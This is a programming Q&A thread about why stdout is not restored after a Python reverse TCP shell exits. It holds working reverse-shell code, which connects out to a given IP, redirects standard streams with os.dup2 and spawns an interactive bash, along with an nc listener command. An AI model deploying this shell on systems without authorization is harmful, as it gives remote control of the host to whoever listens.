# Gracefully killing an orphaned socket

Tags: python, linux, shell, sockets

I am writing a simple agent that spawns a reverse TCP-Shell using the following code.

```
 class ReverseShell:
        def __init__(self, ip, port=9002):
                self.ip = ip
                self.port = port

        def start(self):
                sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                sock.connect((self.ip,self.port))
                os.dup2(sock.fileno(),0)
                os.dup2(sock.fileno(),1)
                os.dup2(sock.fileno(),2)
                subprocess.call(["/bin/bash","-i"]);
                sock.close()
```

I then listen on my destination address using:

```
nc -l 9002
```

The shell connects fine. However, if I type exit it kills the shell, but data still seems to be getting written to the socket, and stops getting written to stdout agent side. If I <kbd>ctrl+c</kbd> out of it the same thing occurs it kills the `/bin/bash` shell but the socket remains open and text on my agent doesn't get written to stdout. What am I missing?

Comment: Seems to work - If I type exit, both the client and server terminate.  But maybe look into the sock.shutdown() method.

Comment: yeah, but if you try to execute a print method after the start function is called you won't get output it has something to do with the os.dup2() call redirecting stdout on the external host but when it is killed it doesn't get redirected back to local.

Answer (score 3):

You need to do `sock.shutdown(socket.SHUT_RDWR)` right before `sock.close()` to terminate the underlying tcp connection.

Comment: Thanks, this fixed one of my problems (closing the socket). However, stdout still doesn't get redirected after the shell is closed. I think it has something to do with the os.dup2() which is redirecting output to my socket. I have no idea how to get it back...and os.close() doesn't seem to work either.

Comment: dup2 closes the target file descriptor and I'm not sure what the normal way of getting it back is. Perhaps you could dup (not dup2) 0, 1, 2 before you dup2 them, and then dup2 them back.